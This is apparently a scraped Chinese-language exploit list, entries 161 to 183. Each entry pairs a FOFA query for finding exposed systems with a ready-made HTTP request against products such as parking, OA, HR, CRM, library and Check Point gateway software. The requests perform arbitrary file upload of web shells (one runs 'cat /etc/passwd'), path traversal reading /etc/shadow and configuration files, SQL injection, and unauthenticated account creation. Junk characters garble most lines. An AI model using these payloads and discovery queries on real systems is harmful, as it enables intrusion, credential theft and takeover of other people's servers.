User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.08 I! m! X6 n+ A/ C
Connection: close
* Q8 J% W6 g& h$ m, i& l& O. rAccept: */*
/ h* r9 Q0 H% BAccept-Language: en. e7 A& \) C6 U
Accept-Encoding: gzip
2 V/ q0 Q1 r. c1 Q- \- U+ P) V0 f; T) c% G. c- ^, U
& d  k- F% y+ s
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 r3 n2 x, ?2 X/ H* t: ~FOFA:body="/KT_Css/qd_defaul.css"; |8 r1 H) M% d7 ?0 p
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
" e  T; z7 c# y# |6 bPOST /Webservice.asmx HTTP/1.1
- w5 N* M% ^# b6 VHost: x.x.x.x* a. t3 |% ~' j+ _0 Y+ G9 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
% C5 C, _8 }% J9 wConnection: close; F! G! \4 u+ `3 Z. y/ k$ n) P9 j
Content-Length: 445
) |! H8 C: ?, y! P7 s# iContent-Type: text/xml
/ \. O" l; x; e$ D3 }Accept-Encoding: gzip
: S% C5 k5 {6 M9 ^4 P6 o% H% J
* U" y" t+ I" N" ^2 L<?xml version="1.0" encoding="utf-8"?>
  x# f, s1 p% F' C+ l6 B<soap:Envelope xmlns:xsi="
% D* Z) E! l* ^8 ohttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ I( ?( e+ x: Y1 U$ _6 qxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# o8 t+ B, B6 }! i<soap:Body>' O( I) p. P; a2 k& M- Z
<UploadResume xmlns="http://tempuri.org/">
5 e+ j( }; F3 q% m3 y( }<ip>1</ip>
! \" c+ b7 @- x: j  R# c<fileName>../../../../dizxdell.aspx</fileName>
7 y7 z5 \9 w, m1 i0 @<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>6 u: I: k* G0 l0 j1 p& a
<tag>3</tag>9 B9 _* ?0 ^2 K: g
</UploadResume>. X0 i& x/ w! Y% `6 \- W
</soap:Body>
1 c! P8 g* q) ]1 S: g0 E</soap:Envelope>
7 u9 B9 M$ Y* {- q
, m# v9 [! x8 K
7 P- q6 r  F9 \. V: Whttp://x.x.x.x/dizxdell.aspx0 w  }6 p4 t  H- n, w! }

3 c. Q5 f6 c( z& [! L( `6 {162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 U3 H  Y" [# K: B- nFOFA: app="和丰山海-数字标牌"
- c3 p6 W% G/ N0 z. f8 s7 h' e# k3 I+ XPOST /QH.aspx HTTP/1.1, m) A. _- z. `# G! s# F. p1 V
Host: x.x.x.x6 |% x7 A4 r+ E4 P& c6 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 t1 z# Q$ d% K
Connection: close
6 m# F  D  k! O2 W# i( n& [Content-Length: 5833 H, _$ w  X" R; z1 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey( V- J: x! \2 O: G
Accept-Encoding: gzip3 D  x  A8 e, B$ A/ S

' B% x% A- H1 n" z3 V+ w7 [/ z$ @------WebKitFormBoundaryeegvclmyurlotuey
7 _6 Z8 D' L) s, tContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
$ {, S, @/ u* nContent-Type: application/octet-stream) ?- {6 U1 P0 i( e: J; [  p" C1 U

0 L1 @5 V' h2 i<% response.write("ujidwqfuuqjalgkvrpqy") %>
3 k# S) _; Q8 A# C- u* ?------WebKitFormBoundaryeegvclmyurlotuey, q' ?( Y" ~+ U, M0 Q1 _. y$ d
Content-Disposition: form-data; name="action"
8 @- m  y7 L$ t& L0 k8 E# f
9 Y( t# ~1 R& G: kupload
! b* h* k* |) x. n, V. H6 K------WebKitFormBoundaryeegvclmyurlotuey
. U/ y7 F) c. r# ^( M0 e8 IContent-Disposition: form-data; name="responderId"9 w2 S$ v/ \8 j- S5 d
! s/ Q. o/ z6 E( R
ResourceNewResponder
5 q/ F6 f( G0 Y" C2 ~7 ?. P------WebKitFormBoundaryeegvclmyurlotuey6 `" o& D+ e2 v# g* _: G& B
Content-Disposition: form-data; name="remotePath"
& R0 J- N7 X2 |% W7 t# v, v7 \' [' \( b" i% p+ d3 {
/opt/resources
% ]1 }5 o* G- K3 a------WebKitFormBoundaryeegvclmyurlotuey--3 G7 a0 w4 R7 C

( `1 v2 ^* J  b- K
% `% a( [3 M; X1 phttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
4 ~; k' b$ V! s1 I$ q* z3 @/ S1 m4 I& J* C1 H& }: g
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传& z8 n; R$ d6 K8 f/ }
FOFA: icon_hash="-795291075") o- `/ j, H# k- z0 X, x
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1* g7 [" o# E, D5 C" ?( b
Host: x.x.x.x/ d  d6 r* c- c7 P* H% o1 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
6 a8 v! I/ x( g7 a! @Connection: close' {7 V5 V, z" n1 a% N, j8 j- Q
Content-Length: 293! H* ~+ V2 Y3 `  U( i/ i- c
Accept: */*
7 r( ^/ q' ~+ H' B5 |5 AAccept-Encoding: gzip, deflate3 r% X' A! j$ U+ d2 Z# W  x. V
Accept-Language: zh-CN,zh;q=0.9- T8 [9 C+ w' X  D, N3 \
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod: Q1 z0 F/ ~! v" v

! |' T9 a8 I: L/ w' v------iiqvnofupvhdyrcoqyuujyetjvqgocod4 D- Q: H# w9 p
Content-Disposition: form-data; name="name"
; t% ]8 `- y' V4 A6 i9 k$ H) L
% n6 \6 L6 v) q. W& \1.php/ v# l( D$ O2 S
------iiqvnofupvhdyrcoqyuujyetjvqgocod, R. A& ~- u; \5 J' Q0 y
Content-Disposition: form-data; name="upfile"; filename="1.php"
* b/ s0 Z! h7 p* z& `) T  pContent-Type: image/jpeg
( s; ?% z4 i  G1 p& v, v& o# ~4 V* I0 {! L, P& Q( @
rvjhvbhwwuooyiioxega) ?' L5 ]2 A7 Q0 F6 s& @
------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 i* B) h( |: s- e' b1 J4 Z# U

+ T! w. W8 u( n9 h: }+ o0 u, d! i
  j+ K# Q! b* _$ v  i$ g6 q& x164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
  r* w' X, ]1 }FOFA: title="智慧综合管理平台登入"8 W. S8 y) V; X4 o' u3 C. d1 j% i2 T8 _
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
0 F% V- T1 N7 g; k% O' l0 i9 p4 nHost: x.x.x.x' x" F5 n# \9 ^. E+ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.09 \" O, [# a8 Z! y* [9 s6 B% z& K
Content-Length: 288
* I6 i+ j+ J+ e2 }1 M7 kAccept: application/json, text/javascript, */*; q=0.01' }2 Q/ V$ m# j1 U! \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
1 b% _8 s" [) `5 h( ]1 OConnection: close
+ @7 A+ c) X0 SContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; |- a0 T: y+ DX-Requested-With: XMLHttpRequest
& E8 f2 U# x; s3 }8 @# EAccept-Encoding: gzip0 G' L; S# z+ e! f( E: O1 m. c
. ?$ g6 `9 l" E) ^& c
------dqdaieopnozbkapjacdbdthlvtlyl6 P" n3 L- P+ @
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"' B) Z, o" e% T$ N8 ?$ K5 h
Content-Type: image/jpeg. h4 R; k4 c( z# E$ v( u& K
0 o* V# Q* v* [3 v# J* l
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>9 G2 N, K6 H$ ^' m( Y4 ^: q" w
------dqdaieopnozbkapjacdbdthlvtlyl--6 f: {% J/ C4 y5 p4 e" c5 E5 O

8 b0 m8 x0 t  ?0 J9 R+ B* v: V* [1 k1 g$ [
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx+ m4 I2 L: W6 B( O; p& i
4 a, w  c# l8 R( H1 K* \
165. OrangeHRM 3.3.3 SQL 注入
; o6 P' {6 @( J& V; TCVE-2024-36428: ~6 c2 o" z0 V* _: l( e* G" A: f" @
FOFA: app="OrangeHRM-产品"# l' ]3 c3 r' {( H) W, r
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))- h5 P/ E) c+ r1 h! o
3 d2 i1 d7 [# k) j$ n5 W
8 P* ^/ i* t$ ?: z3 p
166. 中成科信票务管理平台SeatMapHandler SQL注入
; _: T0 w+ j: {FOFA:body="技术支持:北京中成科信科技发展有限公司"# z8 f! I& W1 e4 U! d! F" j
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
, C$ e. {. {  \3 x/ H" _Host:
7 g- v3 X. ~# p' m1 uPragma: no-cache2 N" z; o9 D5 S$ z
Cache-Control: no-cache) Q( O( C/ _  z5 v
Upgrade-Insecure-Requests: 1$ b5 o  `! T; V* Q: ?2 x! \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ W4 u% w" y+ T1 t2 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( ~0 o" v7 P. b. T- E) i
Accept-Encoding: gzip, deflate
  C# t1 p4 c& XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ w8 E0 c% y2 Y3 R/ E* cCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 K5 V) c( E1 x* @, f
Connection: close
% P8 G2 B. r6 |3 V, X/ _. k4 T# wContent-Type: application/x-www-form-urlencoded
6 o; J- {/ g2 D9 ?Content-Length: 89/ r9 ^: q( R5 l
* |6 s3 {. \  }) H" v
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
5 ^  J& Q) t  ?  t2 U8 J" b% q# u5 y7 U# N
9 |: g/ W+ X6 o& y( j
167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ Y$ }- Z+ d  }FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"; I6 C0 n0 L1 X! j
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1# r* a! |; `2 \
Host:/ u1 h/ m, d  \8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 g! J- Q9 z0 B4 T3 {
Content-Type: application/x-www-form-urlencoded
- Y- e5 V& E7 B. Q! U8 F4 }Accept-Encoding: gzip, deflate
# `' S; z% f7 r, }Accept: */*
: E& Q7 u0 f+ l. vConnection: keep-alive
3 a' w5 R; d/ X/ H* E) R7 R. N* v! e' k3 Y4 S6 b
( Q/ x& X8 v1 J" b
168. 宏景EHR OutputCode 任意文件读取4 R/ ~+ M6 x" F: ]: s. X
FOFA:app="HJSOFT-HCM"
/ z) s  V5 ~# GGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1) t5 V) `' d* N2 l/ z' _  d% F
Host: your-ip2 s( d/ y+ k8 p) E1 x. l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: `7 I& F& c+ n) v$ PContent-Type: application/x-www-form-urlencoded
% c: v7 U; n! K8 G, ]* P  l" ^9 CConnection: close) O! V/ R" W8 j  |% c3 Q+ v
( z: d; s/ ~3 l# [. r
/ z8 I) C- Y4 [2 [

4 M  t# f7 |+ J! \; r- o169. 宏景EHR downlawbase SQL注入6 L* c" [  A4 [2 r! G
FOFA:app="HJSOFT-HCM"' h; ?/ e3 K) M8 U
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1) O0 C) c& u5 e4 J2 ?0 }+ u7 g- n
Host: your-ip
9 f; E! ^* m2 b4 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 N) z; z! s' H6 H1 `
Accept: */*0 N  x" a' ]' Y" S- w) h- \$ v
Accept-Encoding: gzip, deflate
" d  F, R9 {: N6 k0 A! _+ RConnection: close
+ l7 ^! V! ^# e- p2 d
5 p2 o8 [( F- ?; ]; M2 {) _0 W  \2 u: b& p, g

' u# L, q& o4 z; W7 X+ D170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 N% l6 q+ W0 l, d1 O2 v" [
FOFA:body="/general/sys/hjaxmanage.js"
; q! s$ L8 M; O8 k0 G# O  qPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
. b+ h' s" P9 O8 n% uHost: balalanengliang
! V& F# y% X6 t& O- W' {& K, aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& ^/ W3 O0 b& C# E" @( L
Content-Type: application/x-www-form-urlencoded! g5 k4 x8 p0 g
& I# U+ P/ f5 q" D" M' }
filename=../webapps/ROOT/WEB-INF/web.xml
  D  z) H& L& M( J) @$ [- q$ J
2 z7 a% B( f" Z; U! v4 K) b. D* f2 l; Y7 {8 D
171. 通天星CMSV6车载定位监控平台 SQL注入
6 e$ W  I( c  V6 w+ g0 fFOFA:body="/808gps/"
! N( n) J3 h) w1 W. q% aGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1  ]7 a6 \2 Y: D2 |) W8 c
Host: your-ip
8 V4 M$ K  @8 L; H2 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0# F9 t1 Y2 e/ V9 m( A
Accept: */*
* j9 l. L! j: _6 S" v, W6 f! T8 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) a$ z% ]6 g9 c% `+ W2 hAccept-Encoding: gzip, deflate
3 c( Q, Z9 M  I& ?Connection: close( u; w6 {. k( {/ w) E
8 T% g& c) s" j1 o; e- @

3 C1 Q% @! s( o& r0 V# I3 _2 a6 q! y; Y. k& {- H
172. DT-高清车牌识别摄像机任意文件读取4 E3 ^( B7 n% k& P
FOFA:app="DT-高清车牌识别摄像机"9 v# M% R: z9 Z
GET /../../../../etc/passwd HTTP/1.12 [! r. n# C- ]/ ]! }
Host: your-ip
/ q, m" x5 e) q6 g8 y" C6 M2 ?" dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: q- C3 ^8 F8 j( u7 c0 @! vAccept-Encoding: gzip, deflate
  J: v( e6 d3 w/ o4 w0 r8 \Accept: */*- d  j' s% |& Z8 Q" }% G, ?
Connection: keep-alive3 K8 v/ R) z9 w+ N

1 J2 W/ `8 {# `- \; j+ j, Z
' C  c3 h* O1 o, [% _' s. r! z7 D& ]: I6 t; `$ W9 A
173. Check Point 安全网关任意文件读取
- i; ?/ C" J$ V% T1 Q" z0 Z/ bCVE-2024-24919
0 c( T4 o0 k! `5 |7 mFOFA:app="Check_Point-SSL-Network-Extender"
+ l  a! M4 }  s) b7 z  F' k* l- y  {4 |POST /clients/MyCRL HTTP/1.1
. Y+ w# Z' k. [) z. x1 Q- @7 aHost: your-ip; r5 T( f. \7 W, {- v$ ?! a
Content-Type: application/x-www-form-urlencoded
* F/ E4 _$ W( |& p  f! Q, L- A3 X3 D3 ]0 Q& e7 ]
aCSHELL/../../../../../../../etc/shadow, I  q7 b  B* b9 ?9 ^
$ E. \# P4 N% A7 j, A5 |

9 f6 g; B7 y) q9 l$ G* w6 @
6 @) G  ?3 Z; k* }5 _" H174. 金和OA C6 FileDownLoad.aspx 任意文件读取2 h# y% z  l4 g) z! H
FOFA:app="金和网络-金和OA"8 ~1 y# j2 M* W/ z/ M/ V2 |% o
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1; J/ j. s0 |1 Z% o1 W9 i: K% Y5 m+ @1 Z
Host: your-ip
# O( Q( Y7 i: s& YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! L  V4 m8 ^5 D  k6 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. N9 o% C- X0 i6 y9 z; {0 w
Accept-Encoding: gzip, deflate, br  m$ z0 q- k5 O& \% Z  U& Q
Accept-Language: zh-CN,zh;q=0.9
1 P( D5 H" i! N4 V+ Y, o$ _Connection: close
% m3 u/ q8 ~0 m, x6 n1 q, v! V/ d2 }, p  ~
: ]( Q4 B8 f7 [5 Z
  w) Z; t  |, v  q( o' }
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
6 p9 c* \: q8 c% c+ z% x7 d) mFOFA:app="金和网络-金和OA"
; l7 ^# w5 o' P, J0 |8 @: ZGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1$ {' A7 F: D& q' l+ J" x. b  P$ R8 q
Host:! Z5 Z8 z4 i. Q% S5 Q, f
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: d/ g0 J/ Q" JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* ]* M6 B* Q6 |5 }2 z$ ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 |5 p! w8 h) l- jAccept-Encoding: gzip, deflate
3 R+ ~/ d9 _/ y2 f& J2 HConnection: close
  |8 o( g3 L7 ^$ r, a* l) o! gUpgrade-Insecure-Requests: 1( ?  w- K! f% ^

9 l- y" g/ `' u% H% y9 N& m% w3 o8 ?$ \8 }% A# \
176. 电信网关配置管理系统 rewrite.php 文件上传5 e2 M5 U( m* k7 Q. \2 \# N
FOFA:body="img/login_bg3.png" && body="系统登录") c/ ?' e6 d) {9 u% p+ s
POST /manager/teletext/material/rewrite.php HTTP/1.13 _, k' g* M4 B/ L3 \% i
Host: your-ip
  Z+ y  D+ g! k4 L' P9 s7 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
0 T6 O" [' I" \& S" HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT. f: o! a. W' ]% C
Connection: close; a' ?" W& }/ ^# O
' l  e$ X; f0 C
------WebKitFormBoundaryOKldnDPT* J# k6 h; ]1 i
Content-Disposition: form-data; name="tmp_name"; filename="test.php"- q% Z1 g9 D  m- v2 e
Content-Type: image/png- x+ d$ h* k% @+ C. j

, ^% I8 w7 t. f' a' ^$ Z<?php system("cat /etc/passwd");unlink(__FILE__);?>6 t! d" j9 p7 a8 w7 T! W2 ]) F: s' X7 ?
------WebKitFormBoundaryOKldnDPT
4 e7 X  h2 J* t" g2 kContent-Disposition: form-data; name="uploadtime"
7 J# _: n& z5 A. U& h" d ' E$ u  H4 |5 i6 d- x2 X# t

- Z0 \$ Z  h& a6 L# @7 b/ E' X9 _------WebKitFormBoundaryOKldnDPT--
- I, y0 M3 b2 ^0 ?
4 M1 J) o7 p5 z  N' A6 h: U( r; ~& _" V9 r  H
/ o" S% _( U, x" H6 }: J
177. H3C路由器敏感信息泄露
; S- D2 q) X8 {. H/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
( F; t. m- m+ y/ f' k; E5 Q/userLogin.asp/../actionpolicy_status/../M60.cfg
1 v0 ]: l# G" |, `& r+ M/ W5 f/userLogin.asp/../actionpolicy_status/../GR8300.cfg
$ [, s0 G1 T: p/userLogin.asp/../actionpolicy_status/../GR5200.cfg
$ i, k3 j4 |+ D/userLogin.asp/../actionpolicy_status/../GR3200.cfg
5 n6 O, {+ [/ b7 D; h3 p- j. i% w$ E/userLogin.asp/../actionpolicy_status/../GR2200.cfg
+ W* E  J0 K# L! \1 d/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg- o6 j4 }8 M: T8 L; k# N
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
, |7 b- p8 o: C: t* N( ]/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
- \5 ^7 [; f2 i$ Y/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg( _% Y  s3 J  B' z8 j* S. `' v
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
0 }/ L: B/ V8 \$ }7 F/userLogin.asp/../actionpolicy_status/../ER5100.cfg
  l7 I# G* I( M/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg6 @: o' K" V' X/ Z
/userLogin.asp/../actionpolicy_status/../ER3260.cfg# @. q0 k2 U. O, l. A, y. e
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg+ W5 o; i! t) X) }. @, ~2 D1 ^0 h
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/ T3 u0 \% h  b/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg7 Y3 ]; t8 p; X" D# W) x9 S1 X/ |5 ?
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg7 w" L2 c7 z! w& i
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
9 {3 c' y" W5 I& r" y/userLogin.asp/../actionpolicy_status/../ER3100.cfg: E2 t# T+ Z. s9 r' B% }
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
3 E  W" }1 s4 \7 \8 ?5 G
1 f5 G3 f) E$ q/ B2 u/ M8 d  ~  F& r3 B
178. H3C校园网自助服务系统-flexfileupload-任意文件上传! v% q  K+ D7 J1 G
FOFA:header="/selfservice"
4 J) e8 o; B4 F+ SPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 [7 s0 {* w, T% H
Host:
6 ~9 t' [/ M3 Y( G( m! IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. Y8 o: @$ x0 b
Content-Length: 252) Q& U! w5 \0 K8 n6 V  O' h3 G
Accept-Encoding: gzip, deflate4 o6 R) f- q- F! d: l/ N7 O: G
Connection: close. b% @, _5 g" L7 i; i4 A3 W
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
, T. j1 [' r. Y) r-----------------aqutkea7vvanpqy3rh2l- M8 t5 Q' U4 e1 p7 J
Content-Disposition: form-data; name="12234.txt"; filename="12234"
' S' Y! Y" p- P( t: \3 H5 p0 \: K  LContent-Type: application/octet-stream* a' L& u, E! u
Content-Length: 255
9 r- l% ?# G4 `: V( ^. D7 W% v  R! _2 v  |% ?
12234
+ j& d% z8 t% _( Q* n/ \! R) {: j' D-----------------aqutkea7vvanpqy3rh2l--/ k+ U$ b" R  c
; o+ k3 S6 @  _- r) x" z: M! w
  `, ]+ c) A8 n) J  z$ G# ^
GET /imc/primepush/%2e%2e/flex/12234.txt3 P/ ^; L: o1 l+ n. Q

8 {; ~+ c. x5 ?% }# o0 V) Q) e
$ q) S( _# H1 G, W9 z179. 建文工程管理系统存在任意文件读取
  l0 E6 z% {. ]: w  V4 F; v  I+ APOST /Common/DownLoad2.aspx HTTP/1.17 d9 I3 ~. s  ^3 D8 r' a) r
Host: {{Hostname}}( K3 m9 M& V7 N  C
Content-Type: application/x-www-form-urlencoded5 v( @# V9 f$ [7 v- @" g
User-Agent: Mozilla/5.0
$ x* ]& u  M9 v  \8 z& i: K# {. V" G% o3 c9 v* z
path=../log4net.config&Name=
6 l* d$ d4 z2 u: n% ^5 x# P  G4 Q* c9 h9 W5 u+ c

6 k" K4 |3 c% W6 o: o' M180. 帮管客 CRM jiliyu SQL注入# z: D' K# X7 }0 I
FOFA:app="帮管客-CRM"3 k$ X7 i& G: ?: a# f* ?+ ]' F
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1  o# m& J9 _3 c! D2 G* S* T
Host: your-ip. e& ?3 Y, U* S3 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; [( C- J2 K3 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* Y/ L! J0 s4 _4 q7 M. F
Accept-Encoding: gzip, deflate9 G" f+ f) a+ }
Accept-Language: zh-CN,zh;q=0.9% V  e$ ]4 `( e% ~$ \
Connection: close! `4 {/ o' ]4 x+ G! }! I# D

6 w5 v- U* b4 O
8 |# R0 I6 R6 R: A1 P/ ?181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入! x( u- U5 f  k
FOFA:"PDCA/js/_publicCom.js"
% M$ E8 L( c% t' C: hPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.16 [( O, T2 U$ n2 s4 x+ T$ [# S
Host: your-ip& w" q# c- G! B2 M' _" c/ Y# z8 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ h2 Y& W* _7 x# iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 k0 K7 i5 ^3 ^- ?Accept-Encoding: gzip, deflate, br
" X" ~; X- S9 S4 M4 ~Accept-Language: zh-CN,zh;q=0.9
) C8 t0 \! P3 ~Connection: close
% R1 U( j% p5 W# EContent-Type: application/x-www-form-urlencoded  F& P8 {1 _6 }$ b

4 N* ~. l1 [# ~; ^
" b# U3 V* h" G+ ~* haction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
4 U, l* `" x) c8 X: w/ Z/ r/ ^; y( \
1 o1 F+ p. t/ I! @/ d: o' b; q) t. r) V" b
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' V3 |: o. \2 E$ F3 p9 V
FOFA:"PDCA/js/_publicCom.js"- O7 q0 w$ p  \6 O" r  D
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.14 a6 p8 N+ S5 A! W& V( q
Host: your-ip5 T, r- \- Y5 S* Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 W2 b, r4 |+ x5 C( u" GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) q( k* g7 S' c, M& T9 YAccept-Encoding: gzip, deflate, br
7 m2 s+ m1 J2 S/ JAccept-Language: zh-CN,zh;q=0.9
6 ]- Z* r. g2 W& y- uConnection: close
5 [1 G- s3 G8 U4 V6 r  {Content-Type: application/x-www-form-urlencoded
# k; S: X' o9 M5 M9 ]' |( K: ]" s. j8 n. R5 |' o- ]5 E
; a& }; p9 ]. V7 ~
username=test1234&pwd=test1234&savedays=16 K& V  }% N9 S8 [& r0 t" `
/ C. ^1 S# `8 }/ T/ ^8 {

; `! [" r! [# `9 x1 k6 D- Q183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 n0 [! c# X. l+ _FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"1 ^. H& G. A6 L3 B: `! R
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
5 `. b: h5 T$ @$ ~5 S* X1 v, B" r5 C& \0 YHost: your-ip6 ?$ z* }8 ~% s, E! O/ J
